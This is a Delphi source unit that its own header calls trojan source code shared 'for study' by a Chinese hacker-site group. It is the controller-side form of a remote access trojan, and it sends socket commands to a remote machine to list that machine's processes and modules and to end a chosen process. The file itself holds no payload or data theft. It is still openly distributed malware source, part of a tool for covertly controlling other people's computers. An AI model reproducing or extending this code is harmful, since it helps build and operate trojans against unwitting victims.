untprocesslist.pas

木马源程序,供大家研究

{南域剑盟    www.98exe.com   上兴QQ:51992
 声明：程序由南域剑盟98exe.com成员网上搜集，不承担技术及版权问题}
unit untProcessList;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ComCtrls, StdCtrls, Winsock, Menus, untCMDList;

type
  TForm5 = class(TForm)
    TreeView1: TTreeView;
    StatusBar1: TStatusBar;
    PopupMenu1: TPopupMenu;
    Refresh1: TMenuItem;
    N1: TMenuItem;
    EndProcess1: TMenuItem;
    ListModules1: TMenuItem;
    Procedure pAddParent(Name, Threads, PID, hPID: String);
    Procedure pAddChild(dPID, dParent, dName: String);
    procedure Refresh1Click(Sender: TObject);
    procedure EndProcess1Click(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form5: TForm5;
  Sock : TSocket;
  Data : String;
  cProc: Integer;
  cMod : Integer;

implementation

{$R *.dfm}

Procedure TForm5.pAddParent(Name, Threads, PID, hPID: String);
Var
  Parent: TTreeNode;
  Child : Array [0..4] Of TTreeNode;
Begin
  Inc(cProc);
  StatusBar1.Panels[2].Text := IntToStr(cProc)+' Processes';
  Parent   := TreeView1.Items.Add(NIL, ExtractFileName(Name));
  Child[0] := TreeView1.Items.AddChild(Parent, 'Path: '+ExtractFilePath(Name));
  Child[1] := TreeView1.Items.AddChild(Parent, 'Threads: '+Threads);
  Child[2] := TreeView1.Items.AddChild(Parent, 'PID: '+PID);
  Child[3] := TreeView1.Items.AddChild(Parent, 'PID Hex: '+hPID);
  Child[4] := TreeView1.Items.AddChild(Parent, 'Modules (0)');
End;

Procedure TForm5.pAddChild(dPID, dParent, dName: String);
Var
  Parent: TTreeNode;
  Count : Integer;
  Name  : String;
  I     : DWord;
Begin
  If (TreeView1.Items.Count <= 0) Then Exit;
  For I := 0 To TreeView1.Items.Count -1 Do
    If (TreeView1.Items[I].Text = dParent) And
       (TreeView1.Items[I].Item[2].Text = 'PID: '+dPID) Then
    Begin
      Parent := TreeView1.Items[I].Item[4];
      Name := Parent.Text;

      Delete(Name, 1, Pos('(', Name));
      Delete(Name, Pos(')', Name), Length(Name));

      Count := StrToInt(Name);

      If (dName <> '') Then
      Begin
        Inc(Count);
        Name := 'Modules ('+IntToStr(Count)+')';

        Parent.Text := Name;
        TreeView1.Items.AddChild(Parent, ':'+dName);
        Inc(cMod);
        StatusBar1.Panels[3].Text := IntToStr(cMod)+' Modules';
      End;
    End;
End;

procedure TForm5.Refresh1Click(Sender: TObject);
begin
  cProc  := 0;
  cMod   := 0;
  TreeView1.Items.Clear;
  Popupmenu1.Items[1].Enabled := False;
  Sock := StrToInt(StatusBar1.Panels[0].Text);
  If (ListModules1.Checked) Then
    Data := IntToStr(C_PROCESSLIST)+' 1'#10
  Else
    Data := IntToStr(C_PROCESSLIST)+' 0'#10;
  Send(Sock, Data[1], Length(Data), 0);
end;

procedure TForm5.EndProcess1Click(Sender: TObject);
var
  I: Word;
begin
  For I := 0 To TreeView1.Items.Count -1 Do
    If (TreeView1.Items[I].Selected) and
       (TreeView1.Items[I].Text[1] <> ':') and
       (TreeView1.Items[I].Text[1] <> 'P') and
       (TreeView1.Items[I].Text[1] <> 'M') and
       (TreeView1.Items[I].Text[1] <> 'T') Then
       Begin
         Data := IntToStr(C_ENDPROCESS) + ' ' +
                 Copy(TreeView1.Items[I].Item[2].Text, 6, 20) + #10;
         Send(Sock, Data[1], Length(Data), 0);
         Refresh1.Click;
         Break;
       End;
end;

procedure TForm5.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  StatusBar1.Panels[0].Text := '0';
end;

end.